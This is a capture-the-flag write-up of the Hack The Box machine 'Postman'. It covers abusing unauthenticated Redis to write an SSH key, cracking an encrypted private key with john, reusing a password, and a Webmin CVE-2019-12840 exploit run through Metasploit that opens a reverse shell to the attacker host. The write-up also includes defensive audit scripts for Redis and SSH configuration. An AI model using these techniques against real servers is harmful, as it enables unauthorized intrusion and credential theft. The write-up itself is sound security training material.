Postman-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: Redis unauthenticated access, Redis master-slave replication / key-based privilege escalation, id_rsa passphrase cracking, directory enumeration, exploitation of CVE-2019-12840

Reference: https://0xdf.gitlab.io/2020/03/14/htb-postman.html

Reference: https://snowscan.io/htb-writeup-postman/#

0x01 Getting user access

1. Get the target IP address: 10.10.10.160

2. Enumerate the open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p- --min-rate=10000 10.10.10.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 23:39 CST
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.160
Host is up (0.32s latency).
Not shown: 53457 closed tcp ports (reset), 12074 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.910
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.63 seconds

3. Try interacting with Redis on port 6379

┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.160 6379
keys *
*0

4. Using the redis-cli client, we find that we can create data

┌──(kali㉿kali)-[~/桌面]
└─$ redis-cli -h 10.10.10.160
10.10.10.160:6379> keys *
(empty array)
10.10.10.160:6379> incr shiyan
(integer) 1
10.10.10.160:6379> keys *
1) "shiyan"
(1.06s)
10.10.10.160:6379> get shiyan
"1"
10.10.10.160:6379>

5. Use master-slave replication to escalate privileges and get the first reverse shell

There is a known method of getting RCE through Redis using master-slave replication. I wasn't able to get it working here (I'll look at why in Beyond Root). Also, this exploit often leaves the Redis instance in a state where it can no longer be written to, which causes the box to be reset a lot.

Since I can write to Redis, and Redis runs as the user redis, I essentially have an arbitrary write to the filesystem by using the save command to write the database to a file. It is only "almost arbitrary" because I can't write the file cleanly; instead I get junk on both sides of my content. But many file-based attacks on Linux are robust to extra junk. Writing SSH keys is one example: sshd will ignore the junk lines and process the lines in authorized_keys that contain a public key.

I can guess that this is probably the home directory of the user running the Redis server. I can confirm that by changing the current directory to ./.ssh:

10.10.10.160:6379> config set dir ./.ssh
OK
(0.68s)
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379>
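
The reason CONFIG SET dir succeeds for an unauthenticated client is a combination of redis.conf settings (no requirepass, reachable bind address, protected mode off, CONFIG and SAVE not renamed). The checker below is an added example, not part of this writeup or of Redis itself; it parses a redis.conf text, reports which of those weaknesses are present, and contrasts a constructed weak config with a hardened one. The finding ids and both sample configs are my own.

```python
"""Audit a redis.conf for the settings that let an unauthenticated client
run CONFIG SET dir / CONFIG SET dbfilename / SAVE, as seen on this box.
Added example, not part of the writeup; both sample configs are constructed."""

# Human-readable meaning of each finding id this checker can emit.
FINDINGS = {
    "bind_all": "no 'bind' line, or bind to 0.0.0.0/::: reachable from every interface",
    "no_auth": "no 'requirepass': any client that can connect can run commands",
    "protected_mode_off": "'protected-mode no': the safety net for unbound, unauthenticated instances is off",
    "config_cmd": "CONFIG not renamed or disabled: clients can change 'dir' and 'dbfilename'",
    "save_cmd": "SAVE/BGSAVE not renamed or disabled: clients can force a dump to an arbitrary path",
}


def parse_conf(text):
    """Return the active directives as (lowercase keyword, argument string) pairs."""
    directives = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        directives.append((parts[0].lower(), parts[1].strip() if len(parts) > 1 else ""))
    return directives


def audit(text):
    """Return the list of finding ids that apply to this configuration."""
    d = parse_conf(text)
    findings = []

    bind_addrs = [a for k, v in d if k == "bind" for a in v.split()]
    if not bind_addrs or any(a in ("0.0.0.0", "::", "*") for a in bind_addrs):
        findings.append("bind_all")

    if not any(k == "requirepass" and v.strip('"') for k, v in d):
        findings.append("no_auth")

    if any(k == "protected-mode" and v.lower() == "no" for k, v in d):
        findings.append("protected_mode_off")

    # rename-command CONFIG "" disables the command; any other name hides it.
    renamed = set()
    for k, v in d:
        if k == "rename-command":
            parts = v.split()
            if len(parts) == 2:
                renamed.add(parts[0].upper())
    if "CONFIG" not in renamed:
        findings.append("config_cmd")
    if not {"SAVE", "BGSAVE"} <= renamed:
        findings.append("save_cmd")
    return findings


# Constructed sample: the kind of config that makes the box's Redis writable.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: loopback only, password required, dangerous commands removed.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "CHANGE-ME-long-random-secret"
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}:")
        for fid in audit(conf):
            print(f"  - {FINDINGS[fid]}")
```

Disabling CONFIG and SAVE with rename-command removes the write primitive this writeup relies on even if the password is leaked; binding to loopback removes the exposure in the nmap output in the first place.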

6. Generate an SSH key locally and upload it to log in

I'll use ssh-keygen to generate a key, then put it in a file with some extra newlines before and after the key:

┌──(kali㉿kali)-[~]
└─$ cd .ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts known_hosts.old

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t rsa -b 2048
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
/home/kali/.ssh/id_rsa already exists.
Overwrite (y/n)?

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts known_hosts.old

Redis will write a binary database file to authorized_keys; sshd will then open that file as an ASCII text file and read it line by line, looking for a public key that matches the private key presented to it. The newlines help ensure the public key sits on a line of its own.

I can use the -x option of redis-cli, which "reads the last argument from STDIN", to cat the file into redis-cli and set it as the value in the database:

┌──(kali㉿kali)-[~/.ssh]
└─$ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts known_hosts.old spaced_key.txt

┌──(kali㉿kali)-[~/.ssh]
└─$ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set shiyan
OK

Next I'll tell Redis that the dbfilename is authorized_keys, then save:

10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
(1.35s)
10.10.10.160:6379>
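
The trick works because sshd parses authorized_keys line by line and silently skips anything it cannot parse, so an RDB dump that happens to contain a key line is accepted. The script below is an added example, not part of the writeup or of OpenSSH: it audits an authorized_keys file, flags the Redis RDB magic at the start of the file, counts unparseable lines, and lists the lines sshd would still accept as keys. The sample files are constructed and the key material in them is fake (only syntactically valid).

```python
"""Audit an authorized_keys file: flag Redis RDB dumps and other non-key
content, and list the lines sshd would still accept as public keys.
Added example, not part of the writeup; the sample files are constructed
(the key material is fake and only syntactically valid)."""
import base64
import struct

RDB_MAGIC = b"REDIS"                      # every RDB dump begins "REDIS" + 4-digit version
KEY_TYPES = (b"ssh-rsa", b"ssh-ed25519", b"ssh-dss",
             b"ecdsa-sha2-nistp256", b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521")


def _s(b):
    """SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(b)) + b


def _pubkey_line(key_type, *fields):
    """Build a syntactically valid 'type base64' public-key line (constructed test data)."""
    blob = _s(key_type) + b"".join(_s(f) for f in fields)
    return key_type + b" " + base64.b64encode(blob)


def looks_like_key(line):
    """Return the key type if sshd would parse this line as a public key, else None.
    authorized_keys allows an options field before the key type, so fields 0 and 1 are tried."""
    fields = line.strip().split()
    for i in range(min(2, len(fields))):
        if fields[i] in KEY_TYPES and i + 1 < len(fields):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:
                return None
            if len(blob) >= 4:
                n = struct.unpack(">I", blob[:4])[0]
                if blob[4:4 + n] == fields[i]:      # embedded type must match the text type
                    return fields[i].decode()
            return None
    return None


def audit_authorized_keys(data):
    """Summarise a file: is it an RDB dump, which lines are keys, how many lines are junk."""
    result = {"rdb_dump": data.startswith(RDB_MAGIC), "keys": [], "junk_lines": 0}
    for lineno, line in enumerate(data.split(b"\n"), 1):
        if not line.strip():
            continue                               # sshd skips blank lines
        ktype = looks_like_key(line)
        if ktype:
            result["keys"].append((lineno, ktype))
        else:
            result["junk_lines"] += 1              # sshd skips these too, silently
    return result


# Constructed sample 1: a simplified RDB dump whose only value is a newline-padded key
# (value-length bytes and the checksum are not encoded correctly; irrelevant here).
KEY_LINE = _pubkey_line(b"ssh-rsa", b"\x01\x00\x01", b"\x00\xc3" + b"\x5a" * 63)
SAMPLE_RDB_FILE = (
    b"REDIS0008"                              # magic + RDB version
    b"\xfa\x09redis-ver\x054.0.9"             # aux field redis-ver = 4.0.9
    b"\xfe\x00"                               # SELECTDB 0
    b"\x00\x06shiyan"                         # string type, key "shiyan"
    + b"\n\n" + KEY_LINE + b" kali@kali\n\n"  # the value: key padded with newlines
    + b"\xff" + b"\x00" * 8                   # EOF opcode + checksum
)
# Constructed sample 2: a clean file with one ed25519 key.
CLEAN_FILE = _pubkey_line(b"ssh-ed25519", b"\x7f" * 32) + b" user@host\n"

if __name__ == "__main__":
    for name, data in (("rdb-written", SAMPLE_RDB_FILE), ("clean", CLEAN_FILE)):
        print(name, audit_authorized_keys(data))
```

A file that starts with the RDB magic, or that has any junk lines at all, is a strong indicator of this exact technique and is cheap to check in a periodic integrity scan of every ~/.ssh/authorized_keys on a host.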

7. Then log in to the remote target with my own key

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -i ~/.ssh/id_rsa redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Sep 11 2019 .
drwxr-xr-x 22 root root 4096 Sep 30 2020 ..
drwxr-xr-x 6 Matt Matt 4096 Sep 11 2019 Matt
redis@Postman:~$

8. Through enumeration, I found an id_rsa.bak file

redis@Postman:~$ ls -la /opt
total 12
drwxr-xr-x 2 root root 4096 Sep 11 2019 .
drwxr-xr-x 22 root root 4096 Sep 30 2020 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 id_rsa.bak
redis@Postman:~$ file /opt/id_rsa.bak
/opt/id_rsa.bak: PEM RSA private key
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
...(key body omitted)...
-----END RSA PRIVATE KEY-----
redis@Postman:~$

9. Download it locally; the key is passphrase-protected and needs to be cracked

┌──(kali㉿kali)-[~/桌面]
└─$ touch id_rsa.bak

┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john id_rsa.bak > hash.txt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa.bak)
1g 0:00:00:00 DONE (2023-12-17 00:10) 7.692g/s 1898Kp/s 1898Kc/s 1898KC/s concubine..comett
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
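
john cracks this key so quickly because legacy PEM keys ("Proc-Type: 4,ENCRYPTED" with a DEK-Info line) derive the cipher key from the passphrase with OpenSSL's MD5-based EVP_BytesToKey, which has no work factor, whereas OpenSSH-format keys use bcrypt_pbkdf with a configurable round count. The script below is an added example, not part of the writeup or of OpenSSH: it classifies a private key file by format, cipher and KDF and says whether an offline guess at the passphrase is cheap. Both sample keys are constructed and contain no real key material; the is_weak threshold of 16 rounds is my choice (ssh-keygen's default for -a).

```python
"""Classify how an SSH private key file is protected. A legacy PEM key with
'Proc-Type: 4,ENCRYPTED' derives the cipher key from the passphrase with
OpenSSL's MD5-based EVP_BytesToKey (no work factor), which is why john can
try about 1.9M candidates per second against id_rsa.bak above. Keys in the
OpenSSH format use bcrypt_pbkdf with a configurable round count.
Added example, not part of the writeup; both sample keys are constructed
and contain no real key material."""
import base64
import re
import struct


def _s(b):
    """SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(blob, off):
    """Read one wire-format string at offset; return (bytes, new offset)."""
    n = struct.unpack(">I", blob[off:off + 4])[0]
    return blob[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(text):
    """Return format, whether encrypted, cipher, KDF and KDF rounds (None if unknown)."""
    lines = [l.strip() for l in text.strip().splitlines()]
    header = lines[0]
    body = "".join(l for l in lines[1:] if not l.startswith("-----") and ":" not in l)
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode(body)
        off = len(b"openssh-key-v1\x00")            # magic string
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":                         # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            rounds = struct.unpack(">I", kdfopts[o:o + 4])[0]
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    if re.match(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", header):
        encrypted = any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines)
        dek = next((l.split(":", 1)[1].strip() for l in lines if l.startswith("DEK-Info:")), "")
        return {"format": "pem", "encrypted": encrypted,
                "cipher": dek.split(",")[0] if dek else None,
                "kdf": "EVP_BytesToKey(MD5)" if encrypted else None,
                "rounds": 1 if encrypted else None}
    return {"format": "unknown", "encrypted": None, "cipher": None, "kdf": None, "rounds": None}


def is_weak(info):
    """True when an offline guess at the passphrase is cheap (or there is no passphrase)."""
    if not info["encrypted"]:
        return True
    if info["format"] == "pem":
        return True                                  # no work factor at all
    return info["kdf"] != "bcrypt" or (info["rounds"] or 0) < 16   # 16 = ssh-keygen default -a


# Constructed sample: same envelope as /opt/id_rsa.bak, dummy IV and body.
PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

Y29uc3RydWN0ZWQtc2FtcGxlLWJvZHktbm90LWEtcmVhbC1rZXktY29uc3RydWN0ZWQt
c2FtcGxlLWJvZHktbm90LWEtcmVhbC1rZXk=
-----END RSA PRIVATE KEY-----
"""


def _constructed_openssh_key(rounds):
    """Build the outer envelope of an OpenSSH-format key (constructed; payload is dummy bytes)."""
    salt = b"\x11" * 16
    blob = (b"openssh-key-v1\x00" + _s(b"aes256-ctr") + _s(b"bcrypt")
            + _s(_s(salt) + struct.pack(">I", rounds)) + struct.pack(">I", 1)
            + _s(b"dummy-public-key") + _s(b"dummy-encrypted-private-section"))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


OPENSSH_SAMPLE = _constructed_openssh_key(100)

if __name__ == "__main__":
    for name, key in (("legacy PEM", PEM_SAMPLE), ("OpenSSH format", OPENSSH_SAMPLE)):
        info = classify_private_key(key)
        print(name, info, "WEAK" if is_weak(info) else "ok")
```

Re-encrypting an existing key into the OpenSSH format with a high round count (`ssh-keygen -p -o -a 100 -f id_rsa`) turns the 1.9M guesses/s seen above into a few guesses per second; leaving a copy of the key world-readable in /opt, as on this box, is the other half of the problem.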

10. After cracking, SSH login still fails, but the password is reused: Matt's login password is computer2008

11. Get the first flag from the initial shell

redis@Postman:~$ ls /home
Matt
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ cd ~
Matt@Postman:~$ cat user.txt
11c882e77a80e09508d34ca8b8d336d3
Matt@Postman:~$

12. The reason remote SSH login fails is in the config file

Matt@Postman:~$ cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.

Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

#deny users ----------- this line is the reason
DenyUsers Matt

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
Matt@Postman:~$
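
sshd evaluates its access lists in the order DenyUsers, AllowUsers, DenyGroups, AllowGroups, and a DenyUsers match rejects the login before any password or key is considered, which is why Matt's valid password works for su but not for ssh. The script below is an added example, not part of the writeup or of OpenSSH: it parses an sshd_config, answers whether a given user passes those lists, and flags the two global settings on this box a reviewer would raise (PermitRootLogin yes, PasswordAuthentication yes). The sample config is a constructed excerpt; only global directives are evaluated (Match blocks are skipped) and USER@HOST patterns are matched on the user part only, both assumptions of this script.

```python
"""Evaluate a user's SSH access from an sshd_config and flag risky settings.
sshd applies the access lists in the order DenyUsers, AllowUsers, DenyGroups,
AllowGroups (sshd_config(5)); a DenyUsers match rejects the login before
any password or key is considered, which is what blocks Matt here.
Added example, not part of the writeup; the sample config is a constructed
excerpt. Only global directives are evaluated (Match blocks are skipped) and
USER@HOST patterns are matched on the user part only (assumption of this script)."""
import fnmatch
import re


def parse_sshd_config(text):
    """Return global directives as (lowercase keyword, argument) pairs."""
    directives = []
    in_match = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # keyword and args split by space or '='
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ""
        if key == "match":
            in_match = True            # everything until the next Match is conditional
            continue
        if in_match:
            continue
        directives.append((key, value))
    return directives


def _patterns(directives, key):
    return [p for k, v in directives if k == key for p in v.split()]


def _matches(patterns, name):
    for p in patterns:
        if "@" in p:
            p = p.split("@", 1)[0]     # USER@HOST pattern: host part ignored here (assumption)
        if fnmatch.fnmatchcase(name, p):
            return True
    return False


def user_allowed(directives, user, groups=()):
    """Return (allowed, reason) following sshd's Deny/Allow evaluation order."""
    if _matches(_patterns(directives, "denyusers"), user):
        return False, "DenyUsers"
    allow_users = _patterns(directives, "allowusers")
    if allow_users and not _matches(allow_users, user):
        return False, "not listed in AllowUsers"
    if any(_matches(_patterns(directives, "denygroups"), g) for g in groups):
        return False, "DenyGroups"
    allow_groups = _patterns(directives, "allowgroups")
    if allow_groups and not any(_matches(allow_groups, g) for g in groups):
        return False, "not listed in AllowGroups"
    return True, "no access-list directive blocks this user"


def risky_settings(directives):
    """Flag global settings a reviewer would want changed."""
    findings = []
    for k, v in directives:
        if k == "permitrootlogin" and v.lower() == "yes":
            findings.append("PermitRootLogin yes: root can log in directly; prefer 'no' or 'prohibit-password'")
        if k == "passwordauthentication" and v.lower() == "yes":
            findings.append("PasswordAuthentication yes: reused or cracked passwords work over SSH; prefer keys only")
    return findings


# Constructed excerpt mirroring the active directives seen on the box.
SAMPLE_SSHD_CONFIG = """
Port 22
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
DenyUsers Matt
Match User anoncvs
    X11Forwarding no
"""

if __name__ == "__main__":
    d = parse_sshd_config(SAMPLE_SSHD_CONFIG)
    for user in ("Matt", "redis"):
        print(user, user_allowed(d, user))
    for f in risky_settings(d):
        print("-", f)
```

Note that the DenyUsers line only closes the SSH door: the same password still works for su once any other foothold exists, as the writeup shows, so a deny list is not a substitute for removing the reused credential.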

0x02 Getting root

13. Visiting port 10000 reveals some information

http://10.10.10.160:10000/

14. Add a local hosts entry and visit again

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.160 Postman" | sudo tee -a /etc/hosts
10.10.10.160 Postman

15. It is a Webmin service, and Webmin usually runs as root so that it can perform all administrative operations.

16. Log in to the admin panel with Matt:computer2008 and get the version information

17. Search for applicable privilege escalation exploits

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Webmin 1.910
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execut | linux/remote/46984.rb
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Meta | linux/webapps/47330.rb
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m linux/remote/46984.rb
Exploit: Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/46984
Path: /usr/share/exploitdb/exploits/linux/remote/46984.rb
Codes: CVE-2019-12840
Verified: True
File Type: Ruby script, Unicode text, UTF-8 text
Copied to: /home/kali/桌面/46984.rb

18. After trying various exploits, in the end I used msf to get the final flag

https://github.com/roughiz/Webmin-1.910-Exploit-Script/blob/master/webmin_exploit.py

webmin_exploit.py --rhost postman --rport 10000 -u Matt -p computer2008 --lhost 10.10.14.10 --lport 443 -s true

┌──(kali㉿kali)-[~/桌面]
└─$ msfconsole
Metasploit tip: Set the current module's RHOSTS with database values using
hosts -R or services -R


.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v6.3.45-dev ]
+ -- --=[ 2377 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

smsf6 > search CVE-2019-12840

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/webmin_packageup_rce

msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:h
ost:port][...]
RHOSTS yes The target host(s), see https://docs.metasploi
t.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin <= 1.910



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.10:4444
[+] Session cookie: 777dce079d3dccfe40fd4dcb646f5f71
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.10:4444 -> 10.10.10.160:43086) at 2023-12-17 00:52:35 +0800

id
uid=0(root) gid=0(root) groups=0(root)
cd /root/root.txt
cat /root/root.txt
5c456efc266deccdf22e3c5717b48393

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/215


https://sh1yan.top/2023/12/16/Postman-htb-writeup/
Author: shiyan
Published: 2023-12-16